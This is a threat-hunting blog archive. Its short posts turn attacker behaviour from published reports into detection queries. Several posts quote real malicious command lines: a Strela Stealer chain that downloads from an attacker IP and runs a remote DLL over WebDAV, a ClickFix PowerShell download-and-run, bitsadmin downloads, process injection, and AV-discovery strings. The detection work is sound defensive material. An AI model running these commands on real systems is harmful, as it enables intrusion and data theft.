Posts

Showing posts from February, 2025

059. Threat Actors Abuse FTP to Execute Scripts

Hello everyone! I think you are aware of abusing ftp.exe for data exfiltration. But what about command execution? Cado Security Labs shared information on malicious activity attributed to Mustang Panda (we track this cluster as Horned Werewolf). In this campaign the adversary leveraged a very interesting technique - abusing ftp.exe to execute an FTP script hidden inside a disguised PDF file:

C:\Windows\System32\ftp.exe -s:"แบบตอบรับ.pdf"

Of course, if you look for ftp.exe executions with the -s parameter, you'll face lots of false positives (still acceptable for your threat hunting missions!), so you should focus on PDF and other file types which don't commonly contain commands or scripts:

event_type: "processcreate" AND proc_file_name: "ftp.exe" AND cmdline: ("s" AND "pdf")

Despite the fact that the threat actors chose such a creative approach, the installation routine is still quite noisy and includes, for example, dropping an executabl...

058. Hunting for Ghostwriter

Hello everyone! Let's talk about threat hunting this time. What's the difference between threat detection and threat hunting? When you're writing detections, there must be a very low false positive rate; when you're hunting, the query output should include lots of noise - it allows you to uncover threats which were not detected. One of my favourites for threat hunting missions is rundll32.exe abuse. It's EXTREMELY common. Let's look at a recent Ghostwriter campaign described in this report by SentinelLABS. So, the adversary actively abused rundll32.exe to execute malicious DLLs. Here are some procedure examples:

rundll32.exe "C:\Users\<USER>\AppData\Roaming\Microsoft\bruhdll32.dll",FckUDud
rundll32.exe "C:\Users\<USER>\AppData\Roaming\Microsoft\bruhdll32.dll",HelloWorld
rundll32.exe "C:\Users\<USER>\AppData\Roaming\Microsoft\bruhdll32.dll",FCKU
rundll32 "C:\Users\<USER>\AppData\Roaming\Microsoft\SystemCert...

057. Detecting NetExec

Hello everyone! Recently we observed an activity cluster which leveraged NetExec during post-exploitation. It's an open source tool for network service exploitation with LOTS of features. You can learn more about the tool here. From a detection perspective it's also interesting. Today we'll cover only process creation events related to execution of the tool on the compromised system. I often tell you to look at metadata to spot renamed tools - but this time it's not the case, as the NetExec file doesn't have it. At the same time, it has lots of interesting command line arguments, but some of them are very noisy, so, based on my testing, here's the query:

event_type: "processcreate" AND cmdline.keyword:/.* (smb|ldap|winrm|mssql|rdp|wmi|nfs) .*/ AND cmdline: ("u" AND "p") AND cmdline:("zerologon" OR "nopac" OR "printnightmare" OR "smbghost" OR "ms17-010" OR "coerce_plus" OR ...

056. PebbleDash: Detection Opportunities

Hello everyone! Today we'll look at PebbleDash malware behaviors and how to detect them. This backdoor is actively used by Kimsuky (we track this activity cluster as Monolithic Werewolf). Let's look inside this report. The adversary distributed phishing emails with EGG files attached. Not a common choice, right? That's not all. The EGG file contains a PIF file - a binary configuration file for the DOS emulator/simulator in Windows! Such files are not very common, so we can start by hunting for any executions of PIF files:

event_type: "processcreate" AND proc_file_name.keyword:/.*\.pif/

The file drops and opens a PDF file, as well as drops and executes another PIF file - the PebbleDash backdoor, which abuses reg.exe for persistence on the compromised system. Here we have a few detection opportunities. The first one - a PIF file opens a PDF file:

event_type:"processcreate" AND proc_p_file_path.keyword:/.*\.pif/ AND cmdline.keyword:/.*\.pdf/

The next one...

055. Detecting Sticky Werewolf's Forced Authentication Abuse

Hello everyone! Today we'll talk about another interesting technique - Forced Authentication (T1187). It also doesn't have many procedure examples in MITRE ATT&CK. One of the activity clusters we track, Sticky Werewolf, abuses this technique quite often. The adversary distributes phishing emails with malicious documents which contain a resource that is automatically loaded when the document is opened. Using this trick the threat actors obtain authentication material! Many documents have a very low detection rate, for example, this one. So, how can we detect or hunt for such malicious activity? We can search for outbound network connections with destination port 445 (you may also add 137 and 139) originating from winword.exe or excel.exe (you can add PowerPoint):

event_type: "networkconnection" AND net_conn_direction: "outbound" AND net_dst_port: "445" AND proc_file_path: ("winword.exe" OR "excel.exe")

Of course, you may face ...

054. Detecting CypherIT Crypter Behaviors

Hello everyone! I think it's not a secret that many adversaries leverage crypters to evade defenses. But some crypters not only encrypt and obfuscate malicious code, but also have interesting behaviors we can use for detection engineering! Let's look at CypherIT - a very popular crypter which used to be sold on underground resources and was used by lots of various threat actors worldwide (for example, Sticky Werewolf). The first behavior example we'll look at is abusing findstr for AV discovery:

findstr /I "opssvc wrsa"
findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"

To detect it, search for findstr executions with AV/EDR names in the command line (you can expand this list, of course):

event_type: "processcreate" AND proc_file_name: "findstr.exe" AND cmdline: (*wrsa* OR *opssvc* OR *avastui* OR *avgui* OR *nswscsvc* OR *sophoshealth* OR *bdservicehost* OR *ekrn*)

The next noteworthy behavior - dropping and executing a renamed A...

053. Detecting Dead Drop Resolver (DDR) Technique

Hello everyone! Today we'll talk about the Dead Drop Resolver sub-technique (T1102.001), and how to detect it, of course. We'll look at how ACRStealer is abusing it, as seen in this report by AhnLab. So, the stealer uses three services to obtain the C2 list: Steam, Telegraph and Google Docs. Ok, in order to detect suspicious activity, we need to find DNS requests related to these services, but not from common applications, for example, Steam, web browsers, etc. It also depends on your EDR, as some of them may not collect all DNS requests made from browsers, so you don't need to exclude them. In my case Steam has the longest list of exclusions, as it includes games, VPN clients, etc. (note that browsers are excluded by default):

event_type: "dnsreq" AND dns_rname: "steamcommunity.com" AND NOT proc_file_path: ("steam.exe" OR "steamwebhelper.exe" OR "vrwebhelper.exe" OR "cs.exe" OR "avp.exe" OR "wire.exe" ...

052. Detecting Poseidon Stealer's Anti-Analysis Techniques

Hello everyone! We already talked about macOS stealers, but let's talk a bit more about this threat. Today we'll look at Poseidon Stealer and some of its anti-analysis techniques. So, the first technique we'll look at is abusing pkill to terminate processes related to Terminal:

pkill Terminal

To detect it, we can search for pkill process creation events with Terminal in the arguments:

event_type: processcreate AND proc_file_name: "pkill" AND cmdline: "Terminal"

The second thing we'll look at - abusing AppleScript to check for common user names in order to identify an analysis environment and terminate execution:

osascript -e 'if (short user name of (system info)) is "maria" or (short user name of (system info)) is "run" or (short user name of (system info)) is "jackiemac" or (short user name of (system info)) is "bruno" then error number -1'

Here we can search for osascript process creation events with those user ...

051. Bloody Wolf's Techniques From Detection Perspective

Hello everyone! Let's talk about recently uncovered techniques leveraged by the Bloody Wolf activity cluster. The threat actors rely on phishing emails and distribute a legitimate PDF file with malicious links. These links are used to deliver malicious JAR files. They used to distribute STRRAT, but in recent campaigns changed it to legitimate remote access software commonly abused by various adversaries - NetSupport. Details are available in the report, but let's look at some of the detection opportunities. The victim clicks the phishing link and downloads a JAR file. Usually, it's located under the Downloads folder. What about execution? Java is used to execute it, usually with the -jar parameter. What's more, the user must execute it, so the parent process for Java should be explorer.exe. Here's what we got:

event_type: "processcreate" AND proc_p_file_path: "explorer.exe" AND cmdline:("java" AND "jar" AND "Downloads")

To get the...

050. Detecting Dirty Wolf's Tunneling Tool

Hello everyone! Let's talk a bit about tunneling tools. They are extremely common nowadays. I think everybody has heard about Ngrok, right? But what about less common tools? The activity cluster we track under the name Dirty Wolf is constantly using the following tunneling tool - Localtonet. The cluster is involved in ransomware attacks and leverages the leaked LockBit 3.0 builder to generate payloads. So, let's look at Localtonet detection opportunities. As always, we can look at the executable file's metadata to cover renaming, as well as command line parameters (usually it's just "authtoken"):

event_type: processcreate AND proc_file_originalfilename:"localtonet.dll" AND cmdline:"authtoken"

If the adversary uses Localtonet infrastructure (and it's a very common case), we can build detection logic based on DNS queries (make sure you exclude security solutions):

event_type: "dnsreq" AND dns_rname: ("localto.net" OR "localtone...

049. Here's How Mustang Panda Evades AV and How to Detect It

Hello everyone! Let's talk about another sub-technique without any procedure examples - System Binary Proxy Execution: Mavinject (T1218.013). In the report on recent Mustang Panda activity (they track this cluster under the name Earth Preta, we call it Horned Werewolf), Trend Micro shared how the adversary abused Mavinject.exe to inject malicious code into a running process and bypass ESET detection (but my testing shows that the current version of ESET detects it). To do so, the threat actors use Mavinject.exe with the /INJECTRUNNING parameter, for example:

"C:\Windows\SysWOW64\Mavinject.exe" 5928 /INJECTRUNNING "C:\Users\Alice\Desktop\dc673d59a6a9df3d02e83fd03af80e117bea20954602ae416540870b1b3d13c4.dll"

To detect it, let's use the parameter and Mavinject's original file names (adversaries may rename it!):

event_type: processcreate AND proc_file_originalfilename:("mavinject32.exe" OR "mavinject64.exe") AND cmdline:"INJECTRUNNING...

048. Detecting Kimsuky Dropbox Abuse

Hello everyone! Securonix presented a fresh report on recent Kimsuky activity (as you remember, we track this cluster as Monolithic Werewolf). The adversary keeps distributing malicious LNK files and abusing PowerShell, and this time leverages Dropbox. Despite the fact that the attack chain is very sophisticated and has multiple stages, there's a quick win from a detection perspective. So, the thing I want to note is abusing PowerShell to download the next stage from Dropbox. This activity includes querying the following domain name: "dl.dropboxusercontent.com". Of course, we can use this knowledge for detection:

event_type: "dnsreq" AND proc_cmdline:/.*powershell.*/ AND dns_rname: "dl.dropboxusercontent.com"

And yes, this simple detection logic allows us to catch an advanced threat actor! That's it! See you tomorrow!

047. Qilin Ransomware Gang Abuses RSAT to Enable Discovery

Hello everyone! Let's talk about one of my favorite topics - ransomware. And yes, one more time - about PowerShell abuse! Just before ransomware deployment (but in some cases much earlier), adversaries usually need to collect information about remote systems. If you have ever responded to a modern ransomware attack, you should have seen these PowerShell commands, as seen in the Picus report:

"powershell" -Command "Import-Module ActiveDirectory ; Get-ADComputer -Filter * | Select-Object -ExpandProperty DNSHostName"

But what if there is no ActiveDirectory module? Of course, the threat actors try to install it, and it's a great detection opportunity:

"powershell" -Command "ServerManagerCmd.exe -i RSAT-AD-PowerShell ; Install-WindowsFeature RSAT-AD-PowerShell ; Add-WindowsCapability -Online -Name 'RSAT.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0'"

I think it's obvious how to detect such behaviour - just focus on the module name, that's it. ...

046. RedCurl Abuses PowerShell for Collection and Exfiltration: Detection Opportunities

Hello everyone! Let's look at another curious case of PowerShell abuse. This time the adversary used it for data collection and exfiltration. I took the following examples from the eSentire report on RedCurl (we track this activity cluster as Red Wolf). The first example shows how the adversary uses 7-Zip to archive collected data:

powershell -c "gci .*.exe | foreach {if(($.VersionInfo).InternalName -eq '7za'){$syspack = $.Fullname}};$a1='x';$a2='-aoa';$a3='-p'+$env:ppass2;$a4=$env:util;$a5='-o'+$env:tdir;&$syspack $a1 $a2 $a3 $a4 $a5;"

Look at that variable name - $syspack. The cluster loves this name and also used it for naming the 7-Zip binary. From a detection perspective, you can focus on PowerShell executions with "gci" (Get-ChildItem), ".exe" and "7za", as well as command line parameters commonly used by the threat actor with 7-Zip - "x", "-aoa", "-p" and ...

045. Adversaries Abuse Trusted Developer Utilities for Proxy Execution

Hello everyone! Let's talk about another MITRE ATT&CK technique which doesn't have many procedure examples - T1127: Trusted Developer Utilities Proxy Execution. In a campaign tracked by Elastic Security Labs as REF7707, the adversary abused Microsoft Console Debugger to execute malicious shellcode. The tool was renamed to fontdrvhost.exe and used to execute shellcode delivered in the config.ini file:

C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData\fontdrvhost.exe

So, what to look for:

Executables with "CDB.Exe" as the original file name, but not the actual file name
Microsoft Console Debugger executions with -cf arguments

Also, you may focus on -pd -pn arguments, as they enable the adversary to run a shell command. See you tomorrow!

044. Seashell Blizzard Detection: That Easy?

Hello everyone! Today we'll look at another example of an Advanced Persistent Threat, and how easy it really is to detect related malicious activity. Microsoft Threat Intelligence has published a report on Seashell Blizzard - a high-impact threat actor that conducts global activities ranging from espionage to information operations and cyber-enabled disruptions. Let's explore one of the exploitation patterns, which involves vulnerabilities in ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788). First, the threat actors abused bitsadmin to download the Atera installer:

bitsadmin /transfer debjob /download [link_to_installer] C:\ProgramData\temporary.msi

This is a very common malicious behaviour, observed even in various ransomware cases. They also abused curl to solve the same task:

curl -o setup.msi

In both cases the adversary downloaded the agent from *atera.com domains, so you can focus on it in conjunction with bitsadmin and cur...

043. Strela Stealer: Detecting WebDAV Abuse

Hello everyone! Have you ever seen adversaries use WebDAV servers to host malware? Yes, of course! So today we're going to look at detection opportunities related to such activity. Let's look at the recent Strela Stealer infection chain presented by Unit42. The threat actors distributed the stealer through email attachments - zip archives containing JS files. So, the JS file executes the following script:

cmd /c powershell.exe -Command "Invoke-WebRequest -OutFile %temp%\\invoice.pdf hxxp[:]//193.143.1[.]205/invoice.php" && start %temp%\\invoice.pdf && cmd /c net use \\\\193.143.1[.]205@8888\\davwwwroot\\ && cmd /c regsvr32 /s \\\\193.143.1[.]205@8888\\davwwwroot\\281681957614368.dll

Ok, the threat actors abuse PowerShell, but not for malware downloading - they use it to download and save a decoy document. Next, the most interesting thing - using WebDAV. Here's what to look for:

Execution of net with "use" and "davwwwroot" i...

042. Is It Easy to Detect Trojanized Microsoft KMS Activation Tools Used By Sandworm?

Hello everyone! Have you ever detected Microsoft KMS activation tools during your security operations? Yes? Me too! But not all tools are as harmless as one may think! EclecticIQ analysts presented a report on a recent Sandworm campaign, where the threat actors used trojanized Microsoft KMS activation tools to deliver the BACKORDER loader. If you look through the report, the first thing you notice - BACKORDER is quite noisy. For example:

It abuses wmic to add a Microsoft Defender exclusion path and collect information on the system's network adapter configuration
It abuses reg to collect information on the Microsoft Defender AntiSpyware feature state
It abuses sc query to collect information about the Microsoft Defender related service

The funny thing - it's expected behavior for KMS activation tools! What's more, Dark Crystal RAT is masqueraded to look like a KMS activation tool: C:\Users\User\AppData\Roaming\kms2023\kms2023.exe! Thankfully, there's another copy located in C:\...

041. BadIIS: Hunting and Detection

Hello everyone! Today we'll talk about a sub-technique of T1505 - T1505.004: IIS Components. Again, it doesn't have lots of procedure examples in MITRE ATT&CK, so I'm excited to see it leveraged by real adversaries! Recently Trend Micro published a report on a Chinese-speaking threat actor which manipulates SEO to display unauthorized ads and distribute malware. To do it, the adversary exploited vulnerable IIS servers in order to install BadIIS. Let's look at some detection and hunting opportunities. Let's start with stopping and starting IIS services. The adversary uses iisreset /stop and iisreset /start. Next, the threat actors abused AppCmd to install BadIIS. So, it's a good idea to hunt for suspicious executions of appcmd.exe with install module. Also, the adversary may want to modify the file attributes of BadIIS abusing attrib, for example, with the following parameters: +a +s +r +i +h. See you tomorrow!

040. Kimsuky Abuses RDP Wrapper in a Recent Campaign

Hello everyone! I'm sure you have at least heard about the Kimsuky group (we track this activity cluster under the name Monolithic Werewolf). According to AhnLab, in a recent campaign the adversary started to use a custom-made RDP Wrapper. So, RDP Wrapper is used by the threat actors to enable concurrent RDP connections to the compromised system. Of course, this utility has lots of detection opportunities. For example, it has a few interesting strings in its metadata: "RDPWInst.exe", "RDPWInst", "RDP Wrapper Library Installer", etc. Next, it creates an "RDP Wrapper" folder and drops two files there: "rdpwrap.ini" and "rdpwrap.dll". Also, it modifies the HKLM\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll value to "%ProgramFiles%\RDP Wrapper\rdpwrap.dll". It's not the first time an adversary uses this tool, so make sure you can detect such activity! See you tomorrow!

039. Adversaries Abuse MSBuild.exe to Deploy Malicious C# Code

Hello everyone! Today we'll talk about MSBuild.exe and trusted developer utilities proxy execution (T1127.001). There aren't many procedure examples in MITRE ATT&CK, so it's quite interesting to spot such examples in-the-wild. In a recent campaign (check the Cyble report for more details) adversaries distribute ZIP archives with LNK files (masqueraded as a PDF) and an XML project file (masqueraded as a PNG) to deliver malware to the compromised system. Opening the LNK copies the file "logo.png" to "%temp%\darkmoon.xml" and creates a scheduled task named "Darkmoon Gaming", which runs every 15 minutes. The task runs the following command:

cmd.exe /c powershell -nop -w h Start-Process [path_to_MSBuild.exe]\MSBuild.exe [path_to_temp]\darkmoon.xml

By the way, even in this case the threat actors abuse PowerShell - it's extremely popular! As for MSBuild.exe, one more time - focus on suspicious file extensions and locations! That's it!...

038. Adversaries Abuse PowerShell to Steal Email Addresses

Hello everyone! Today we'll look at another example of PowerShell abuse. The SonicWall Capture Labs threat research team reported on a curious Outlook email address stealer written in PowerShell. The stealer is downloaded to the compromised system via an HTA file delivered via phishing. The installation phase is quite noisy, as always. For example, mshta.exe is communicating with amazonaws[.]com, PowerShell is executed with -ExecutionPolicy Bypass, and the script itself contains interesting strings, for example, InvokeCommand.ExpandString('$env:APPDATA\Microsoft\.Outlook'). So, lots of detection opportunities! Also, it looks like it's just the first stage - and it's the best place to detect if you failed to prevent! See you tomorrow!

037. The Easiest Way to Detect a macOS Stealer

Hello everyone! What do you know about macOS stealers? Looks like one can buy them on underground resources. And yes, we're seeing them in-the-wild more and more often! But we are interested in detection opportunities, of course! Let's look at a report published by Unit42. There's an overview of three stealers: Atomic Stealer, Poseidon Stealer and Cthulhu Stealer. If we look through the report, we can see a very distinct feature: all of them abuse AppleScript to obtain the victims' password! So, what to look for? Look for osascript executions with display dialog and password in the command line! That's it! That easy! See you tomorrow!

036. macOS FlexibleFerret Malware: Detection and Hunting Opportunities

Hello everyone! Let's talk a bit about macOS malware! Not very common, I know. And that's why it's very interesting! Recently SentinelOne published a report on macOS malware called FlexibleFerret. Let's look at some detection and hunting opportunities. The first thing that caught my eye is the domain: zoom.callservice[.]us. Adversaries often masquerade the domains they use to look legitimate, so it's always a great idea to hunt for suspicious domains which contain the names of popular applications. Here we have Zoom, but you can search for Teams, Skype and other similar apps as well. Next thing - persistence, of course! As always, threat actors choose VERY common mechanisms - this time LaunchAgents. Again, masqueraded to look like Zoom (com.zoom.plist), but it points to... /private/var/tmp/logd! Doesn't look like Zoom, right? So, this time it's a bit more difficult to spot malicious activity, but if you know where to look - quite possible! See you tomorrow!

035. Is It a Must for Adversaries to Masquerade Phishing Attachments Properly?

Hello everyone! In our recent research we looked at a Nova Stealer (it's a SnakeLogger fork) campaign targeting CIS. It is noteworthy that the threat actors don't care much about masquerading: they do not use double file extensions or fake icons to make the malicious file appear as a legitimate document. From the detection perspective, it's quite straightforward:

Uses Add-MpPreference to bypass Windows Defender
Uses schtasks.exe for creating a scheduled task
Gets IP and country details using checkip[.]dyndns[.]org or reallyfreegeoip[.]org

As always, those are just a few detection opportunities, there are more! See you tomorrow!

034. That's How Real Adversaries Abuse PowerShell for Persistence

Hello everyone! I keep collecting interesting PowerShell abuse examples observed in-the-wild. Recently I spotted another one reading this report. In this case the threat actors leveraged PowerShell to create a scheduled task:

"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\<USER>\AppData\Roaming\9secur32_5.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C51CED40-3F5F-4FAF-E44D-E40FBA838523}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"

It's not an uncommon persistence mechanism, but I don't often see adversaries use those cmdlets. As you can see, the task is masqueraded to look like Microsoft ...

033. Free Google Threat Intelligence Course

Hello everyone! Everybody loves free courses, right? Have you missed the free course on Google Threat Intelligence? If the answer is "Yes", it's your chance to check it! I like this course as it not only overviews the capabilities of Google Threat Intelligence as a product, but also covers various threat intelligence use cases, for example, how to empower incident response and forensic investigations or how to use it for adversary hunting and tracking. I've already got my completion badge. What about you? See you tomorrow!

032. DarkGate Delivery via ClickFix Attack: Detection and Hunting Opportunities

Hello everyone! Today we're going to talk about DarkGate Loader and ClickFix attacks. Both are quite common - I'm not sure about ClickFix, but DarkGate is used by adversaries even in CIS. Let's look at a recent ClickFix campaign analysed by Malwarebytes Labs. The chain starts from a malicious Google ad. If the victim clicks it, he or she sees a fake "Verify you are human" page. After checking the box, the victim sees instructions on how to launch the Run dialog and paste a malicious PowerShell script:

cmd /c "powershell -w h -e [base64_encoded_commands] && I am human - Ray ID:4092"

As you can see, the threat actors added an interesting string to make the "verification" look more legitimate. You definitely can use it for detection! If we decode the Base64, we can see very common cmdlets used by adversaries for downloading and running malicious files: "Invoke-WebRequest" and "Start-Process". So, this is another detection oppo...